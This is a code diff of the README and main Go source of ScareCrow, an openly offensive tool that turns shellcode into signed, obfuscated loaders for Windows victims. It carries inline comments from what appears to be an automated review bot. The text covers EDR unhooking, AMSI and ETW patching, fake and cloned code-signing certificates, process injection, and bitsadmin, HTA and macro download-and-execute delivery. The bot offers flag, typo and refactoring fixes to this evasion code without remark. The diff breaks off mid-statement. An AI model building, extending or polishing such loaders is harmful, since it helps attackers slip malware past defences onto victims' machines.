This library does two things: -* Code signs the Loader: + Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option. +* ScareCrow also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes. This option can use DLL or .exe files to copy using the `clone` command-line option, along with the path to the file you want to copy the certificate from. + + #### OpSec Consideration: - When signing the loader with microsoft.com, using them against WINDOWS DEFENDER ATP products may not be as effective as they can validate the cert as it belongs to them. If you are using a loader against a windows product possibly use a different domain. + When signing the loader with microsoft.com, using them against WINDOWS DEFENDER ATP products may not be as effective as they can validate the cert as it belongs to them. If you are using a loader against a windows product, possibly use a different domain. * Spoof the attributes of the loader: This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. 
Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned. @@ -42,10 +64,16 @@ Files that are signed with code signing certificates are often put under less sc

+ With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed. +### Custom Attribute Files +While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name. + + + ## Requirements -ScareCrow now requires golang 1.16.1 or later to compile loaders. If you are running an older version please to version 1.16.1 or later. +ScareCrow now requires golang 1.19.1 or later to compile loaders. If you are running an older version, please use version 1.19.1 or later. See for new versions: https://golang.org/dl/. @@ -58,6 +86,9 @@ To install them, run following commands: go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo +go get github.com/Binject/debug/pe +go get github.com/awgh/rawreader + ``` Make sure that the following are installed on your OS: ``` @@ -71,7 +102,7 @@ Then build it ``` go build ScareCrow.go ``` -In addition ScareCrow utilizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. +In addition, ScareCrow utilizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. Note: Several of the dependencies do not play well on Windows when compiling, because of this it is recommended to compile your loaders on OSX or Linux. 
@@ -95,6 +126,17 @@ Note: Several of the dependencies do not play well on Windows when compiling, be Fear is a TEACHER. the first one you ever had.” Usage of ./ScareCrow: + -Evasion string + Sets the type of EDR unhooking technique: + [*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk. + [*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace. + [*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls. (default "Disk") + -Exec string + Set the template to execute the shellcode: + [*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall. + [*] ProcessInjection - Process Injection Mode. + [*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread. + [*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process (default "RtlCopy") -I string Path to the raw 64-bit shellcode. -Loader string @@ -107,6 +149,8 @@ Usage of ./ScareCrow: [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. + -clone string + Path to the file containing the certificate you want to clone -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console 
@@ -118,82 +162,113 @@ Usage of ./ScareCrow: [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders). -domain string The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) + -encryptionmode string + Sets the type of encryption to encrypt the shellcode: + [*] AES - Enables AES 256 encryption. + [*] ELZMA - Enables ELZMA encryption. + [*] RC4 - Enables RC4 encryption. (default "ELZMA") + -export string + For DLL Loaders Only - Specify an Export function for a loader to have. -injection string Enables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path). -noamsi - Disables the AMSI patching that prevents AMSI BuffferScanner. + Disables the AMSI patching that prevents AMSI BufferScanner. -noetw Disables the ETW patching that prevents ETW events from being generated. -nosign Disables file signing, making -domain/-valid/-password parameters not required. -nosleep Disables the sleep delay before the loader unhooks and executes the shellcode. + -obfu + Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile -outpath string The path to put the final Payload/Loader once it's compiled. -password string The password for code signing cert. Required when -valid is used. -sandbox Enables sandbox evasion using IsDomainJoined calls. - -sha256 - Provides the SHA256 value of the loaders (This is useful for tracking) - -unmodified - When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default) -url string URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/) -valid string The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired. 
``` ## Loader -The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory: +The Loader determines the type of technique type used to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory: * Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory. -* WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not injected) DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load. -* Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. -* Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. +* WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not inject) the DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load. 
+* Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. +* Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. -ScareCrow can also generate binary based payloads if needed by using the `-Loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. +ScareCrow can also generate binary based payloads if needed by using the `-Loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. ## Console -ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional `-ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. +ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspicious and an indicator of maliciousness. 
ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional `-ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing. -## Process Injection -ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write­Process­Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. -This option can be used with any of the loader options. 
To enable process injection, use the `-injection` command-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. +## Execution Methods + +ScareCrow uses different templates to execute shellcode. To choose which template use the `-Exec` command-line option. These templates include: + +* RtlCopy +* NtQueueApcThreadEx +* VirtualAlloc +* ProcessInjection + +### Process Injection +ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory, the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write¬Process¬Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. + +This option can be used with any of the loader options. To enable process injection, use the `-injection` ccommand-line option along with the full path to the process you want to use to inject into. 
When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. + ## AMSI & ETW Bypass ScareCrow contains the ability to patch AMSI (Antimalware Scan Interface) and ETW functions, preventing any event from being generated by the process. -AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows products don't need to "hook" AMSI rather they load the necessary DLL to in order to gain enhanced insight into the process. Because of this ScareCrow loads the AMSI.dll dll and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. +AMSI is a Windows native API that allows Windows Defender (or other antimalware products) to interface deep in the Windows operating system and provide enhanced protection, specifically around in-memory-based attacks. AMSI allows security products to better detect malicious indicators and help stop threats. Since AMSI is native to Windows, products don't need to "hook" AMSI, rather they load the necessary DLL to gain enhanced insight into the process. Because of this, ScareCrow loads the AMSI.dll DLL and then patches, to ensure that any results from the scanning interface come back clean. Patching AMSI is default in all loaders, if you wish to not patch AMSI use the `-noamsi` command-line option to disable it in your loader. -ETW utilizes built-in Syscalls to generate this telemetry. 
Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders, if you wish to not patch ETW use the `-noetw` command-line option to disable it in your loader. +ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is also a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Patching ETW is now default in all loaders, if you wish to not patch ETW, use the `-noetw` command-line option to disable it in your loader. Currently, these options only work for the parent process, if the `-injection` command-line option is used the primary process will patch AMSI and ETW but the injected process -## Delivery -The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: -* Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. -* HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders. -* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. 
This delivery command is compatible with Control, Excel and Wscript loaders. +## Encryption +Encrypting shellcode is an important technique used to protect it from being detected and analyzed by EDRs and other security products. ScareCrow comes with multiple methods to encrypt shellcode, these include AES, ELZMA, and RC4. -## Custom Attribute Files -While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name. +### AES +AES (Advanced Encryption Standard) is a symmetric encryption algorithm that is widely used to encrypt data. ScareCrow uses AES 256 bit size to encrypt the shellcode. The advantage of using AES to encrypt shellcode is that it provides strong encryption and is widely supported by cryptographic libraries. However, the use of a fixed block size can make it vulnerable to certain attacks, such as the padding oracle attack. +### ELZMA +ELZMA is a compression and encryption algorithm that is often used in malware to obfuscate the code. To encrypt shellcode using ELZMA, the shellcode is first compressed using the ELZMA algorithm. The compressed data is then encrypted using a random key. The encrypted data and the key are then embedded in the exploit code. The advantage of using ELZMA to encrypt shellcode is that it provides both compression and encryption in a single algorithm. This can help to reduce the size of the exploit code and make it more difficult to detect. 
+ + +### RC4 +RC4 is a symmetric encryption algorithm that is often used in malware to encrypt shellcode. It is a stream cipher that can use variable-length keys and is known for its simplicity and speed. + + +## Obfuscate +Using `-obfu` ccommand-line option enables Garbles Literal flag during the compilation process. This replaces any golang library references and strings with a more complex version, that resolves to the same value during run-time. This process takes a longer time to complete, resulting in a larger GO file. Once the file is compiled ScareCrow parses the newly created file, stripping out any GO string-based IOCs. + + + +## Delivery +The delivery command-line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: +* Bits – This will generate a bitsadmin command that downloads the loader remotely, executes it and removes it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. +* HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders. +* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders. (Please note that this method may take longer then the default timer depending on how slow the victim's endpoints available resources) -## Hash -Since ScareCrow creates unique loaders that can also be embedded in scripts or other files for delivery, ScareCrow has the ability to provide you the hashes of all artifacts, using the `-sha256`. 
## To Do -* Currently only supports x64 payloads * Some older versions of Window's OSes (i.e. Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability * Patch ETW and AMSI in Injected processes ## Credit * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo) * Special thanks to mvdan for developing [Garble](https://github.com/burrowers/garble) +* Special thanks to mvdan for developing [Binject](github.com/Binject/debug/pe) +* Special thanks to modexp's detailed [article]("https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/") + diff --git a/ScareCrow.go b/ScareCrow.go index f188255..4741848 100644 --- a/ScareCrow.go +++ b/ScareCrow.go @@ -6,13 +6,8 @@ import ( "ScareCrow/Utils" "ScareCrow/limelighter" "bytes" - "crypto/aes" - "crypto/cipher" - "encoding/base64" - "encoding/hex" "flag" "fmt" - "io/ioutil" "log" "os" "os/exec" @@ -37,7 +32,14 @@ type FlagOptions struct { sandbox bool sleep bool nosign bool + evasion string path string + obfuscate bool + export string + clone string + KnownDLLs bool + encryptionmode string + exectype string } func options() *FlagOptions { 
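Review bot: The new `KnownDLLs` field is the only exported field in `FlagOptions`, and unlike the other fields added here it is not set in the literal that `options()` returns (the `-Evasion` choice goes into `evasion`), so as far as this diff shows it is always false. Either drop it or rename it `knownDLLs` and populate it; an unused exported field on an otherwise all-unexported struct invites confusion. I can't see whether another file assigns it, so treat this as a question if one does.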
@@ -51,17 +53,24 @@ func options() *FlagOptions { [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. [*] wscript - Loads into WScript process using a JScript loader.`) - refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)") URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)") CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely: [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel, and Wscript Loaders). [*] hta - Generates a blank hta file containing the loader along with an MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders). [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders).`) domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ") + exectype := flag.String("Exec", "RtlCopy", `Set the template to execute the shellcode: +[*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall. +[*] ProcessInjection - Process Injection Mode. +[*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread. +[*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process`) + evasion := flag.String("Evasion", "Disk", `Sets the type of EDR unhooking technique: +[*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk. 
+[*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace. +[*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.`) password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.") - AMSI := flag.Bool("noamsi", false, "Disables the AMSI patching that prevents AMSI BuffferScanner.") + AMSI := flag.Bool("noamsi", false, "Disables the AMSI patching that prevents AMSI BufferScanner.") ETW := flag.Bool("noetw", false, "Disables the ETW patching that prevents ETW events from being generated.") - Sha := flag.Bool("sha256", false, "Provides the SHA256 value of the loaders (This is useful for tracking)") ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).") configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the default ones.") valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.") 
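Review bot: The two new flags are registered as `-Exec` and `-Evasion` while every other option in this function is lowercase (`-url`, `-delivery`, `-domain`, `-noamsi`, `-injection`, and the ones added in the next hunk), and `flag` matching is case-sensitive, so `-exec` will fail with "flag provided but not defined"; consider `flag.String("exec", ...)` and `flag.String("evasion", ...)` to match, or document the capitalization. The help text also has typos: `Retrives` (twice) should be `Retrieves`, and the `None` entry `The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.` reads better as `The loader will not remove the EDR hooks in system DLLs and will only use custom syscalls.` `options()` continues past this hunk.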
@@ -69,8 +78,15 @@ func options() *FlagOptions { sleep := flag.Bool("nosleep", false, `Disables the sleep delay before the loader unhooks and executes the shellcode.`) nosign := flag.Bool("nosign", false, `Disables file signing, making -domain/-valid/-password parameters not required.`) path := flag.String("outpath", "", "The path to put the final Payload/Loader once it's compiled.") + obfuscate := flag.Bool("obfu", false, `Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile`) + export := flag.String("export", "", "For DLL Loaders Only - Specify an Export function for a loader to have.") + encryptionmode := flag.String("encryptionmode", "ELZMA", `Sets the type of encryption to encrypt the shellcode: + [*] AES - Enables AES 256 encryption. + [*] ELZMA - Enables ELZMA encryption. + [*] RC4 - Enables RC4 encryption.`) + clone := flag.String("clone", "", "Path to the file containing the certificate you want to clone") flag.Parse() - return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, Sha: *Sha, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox, sleep: *sleep, nosign: *nosign, path: *path} + return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, evasion: *evasion, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, exectype: *exectype, ProcessInjection: *ProcessInjection, valid: *valid, sandbox: *sandbox, sleep: *sleep, path: *path, nosign: *nosign, obfuscate: *obfuscate, export: *export, encryptionmode: *encryptionmode, clone: *clone} } func execute(opt *FlagOptions, name string) string { 
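Review bot: The `-obfu` help string has a typo and a broken sentence (`golang libray strings`, `This creates a larger loader and times longer to compile`); suggest `Enables garble's -literals flag, which replaces Go library strings with more complex variants that resolve to the same value at run-time. This produces a larger loader and takes longer to compile.` The `-clone` help text, `Path to the file containing the certificate you want to clone`, does not say what kind of file `limelighter.Cloner` expects, and it is passed through as-is, so one more clause there would save users a failed run. The `[*]` lines of the `-encryptionmode` help are indented one space deeper than those of `-Exec` and `-Evasion` in the previous hunk; align them so the usage output is consistent.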
@@ -79,7 +95,6 @@ func execute(opt *FlagOptions, name string) string { var cmd *exec.Cmd if opt.configfile != "" { oldname := name - name = limelighter.FileProperties(name, opt.configfile) cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"") err := cmd.Run() if err != nil { 
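Review bot: With the `limelighter.FileProperties` call removed here, `oldname` and `name` are identical when `exec.Command("mv", "../"+oldname+"", "../"+name+"")` runs, so the move is a self-rename, and the only remaining `FileProperties` call now sits after the `mv` (visible as context in the next hunk), meaning this block never moves the file to its new name. If the renaming now happens inside `FileProperties`, the `mv` and `oldname` are dead and should be deleted; otherwise the `name = limelighter.FileProperties(name, opt.configfile)` line needs to come back before the `mv`. I can't see what the `err != nil` branch does, and `execute`'s body continues outside this hunk.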
@@ -89,15 +104,29 @@ func execute(opt *FlagOptions, name string) string { name = limelighter.FileProperties(name, opt.configfile) } if opt.LoaderType == "binary" { - cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags", "-w -s -buildid=", "-o", ""+name+".exe") + if opt.obfuscate == true { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-literals", "-seed=random", "build", "-o", ""+name+".exe") + } else { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "go", "build", "-trimpath", "-ldflags=-w -s -buildid=", "-o", ""+name+".exe") + + } } else { cwd, err := os.Getwd() if err != nil { fmt.Println(err) } - cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") + if opt.obfuscate == true { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "-literals", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") + + } else { + cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp 
-w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") + } + } + if opt.obfuscate == true { + fmt.Println("[*] Compiling Payload with the Garble's literal flag... this will take a while") + } else { + fmt.Println("[*] Compiling Payload") } - fmt.Println("[*] Compiling Payload") var out bytes.Buffer var stderr bytes.Buffer cmd.Stdout = &out @@ -117,8 +146,8 @@ func execute(opt *FlagOptions, name string) string { if opt.nosign == false { limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname) } - if opt.Sha == true { - Utils.Sha256(compiledname) + if opt.clone != "" { + limelighter.Cloner(compiledname, opt.clone) } return name } @@ -146,6 +175,18 @@ func main() { log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command") } + if opt.exectype != "RtlCopy" && opt.exectype != "NtQueueApcThreadEx" && opt.exectype != "ProcessInjection" && opt.exectype != "VirtualAlloc" { + log.Fatal("Error: Invalid execution type, please select one of the allowed types") + } + + if opt.evasion != "Disk" && opt.evasion != "KnownDLL" && opt.evasion != "None" { + log.Fatal("Error: Invalid evasion method, please select one of the allowed") + } + + if opt.encryptionmode != "AES" && opt.encryptionmode != "ELZMA" && opt.encryptionmode != "RC4" { + log.Fatal("Error: Invalid encrpytion type, please select one of the allowed encrpytion types") + } + if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" { log.Fatal("Error: Invalid loader, please select one of the allowed loader types") } 
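Review bot: The four `exec.Command` invocations in the new `if opt.obfuscate == true` / `else` branches repeat the environment prefix and output arguments verbatim and differ only in the tool and the presence of `-literals`, so they will drift apart (the two `binary` branches already do not pass the same build flags, which may be unintended). Build the argument list once and append the variant pieces, e.g. `args := []string{"GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", ...}` followed by `if opt.obfuscate { args = append(args, "-literals") }` and `cmd = exec.Command(bin, args...)`. Also write `if opt.obfuscate {` rather than `== true`, here and in the two `fmt.Println` branches below; `execute` continues outside this hunk.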
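Review bot: `limelighter.Cloner(compiledname, opt.clone)` is called purely for its side effect with nothing checked; if it reports failure (I can't see its signature from here) the function still returns `name` as though the clone succeeded, so capture and report its result the way the compile error is handled. Minor: `if opt.nosign == false` reads better as `if !opt.nosign`. Replacing `-sha256` also removes the only place the tool printed the hash of the artifact it produced, which is what an operator uses to track which file was generated for which engagement; consider keeping a hash print that is independent of signing.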
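Review bot: The three new validation chains have message defects: the `-Evasion` error ends mid-phrase (`please select one of the allowed` with no noun) and the `-encryptionmode` error misspells `encrpytion` twice; suggest `log.Fatal("Error: Invalid evasion method, please select one of the allowed evasion methods")` and `log.Fatal("Error: Invalid encryption type, please select one of the allowed encryption types")`. Style-wise, `switch opt.exectype { case "RtlCopy", "NtQueueApcThreadEx", "ProcessInjection", "VirtualAlloc": default: log.Fatal(...) }` reads more clearly than a four-term `!=` chain and keeps the accepted set in one place. Nothing in this hunk checks that `-Exec ProcessInjection` is paired with an `-injection` path (or that `-injection` is rejected with the other exec types); if that is enforced elsewhere in `main`, ignore this.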
@@ -197,35 +238,15 @@ func main() { if opt.ProcessInjection != "" && opt.refresher == true { log.Fatal("Error: Can not use the unmodified option with the process injection loaders") } + if opt.LoaderType != "dll" && opt.export != "" { + log.Fatal("Error: Export option can only be used with DLL loaders ") + } Utils.CheckGarble() - var rawbyte []byte - src, _ := ioutil.ReadFile(opt.inputFile) - dst := make([]byte, hex.EncodedLen(len(src))) - hex.Encode(dst, src) - r := base64.StdEncoding.EncodeToString(dst) - rawbyte = []byte(r) - key := Cryptor.RandomBuffer(32) - iv := Cryptor.RandomBuffer(16) - - block, err := aes.NewCipher(key) - if err != nil { - log.Fatal(err) - } - paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize) - if err != nil { - log.Fatal(err) - } - fmt.Println("[*] Encrypting Shellcode Using AES Encryption") - cipherText := make([]byte, len(paddedInput)) - ciphermode := cipher.NewCBCEncrypter(block, iv) - ciphermode.CryptBlocks(cipherText, paddedInput) - b64ciphertext := base64.StdEncoding.EncodeToString(cipherText) - b64key := base64.StdEncoding.EncodeToString(key) - b64iv := base64.StdEncoding.EncodeToString(iv) + b64ciphertext, b64key, b64iv := Cryptor.EncryptShellcode(opt.inputFile, opt.encryptionmode) fmt.Println("[+] Shellcode Encrypted") - name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI) + name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI, opt.export, opt.encryptionmode, opt.exectype, opt.evasion) name = execute(opt, name) - Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.Sha, opt.path) + Loader.CompileLoader(opt.LoaderType, 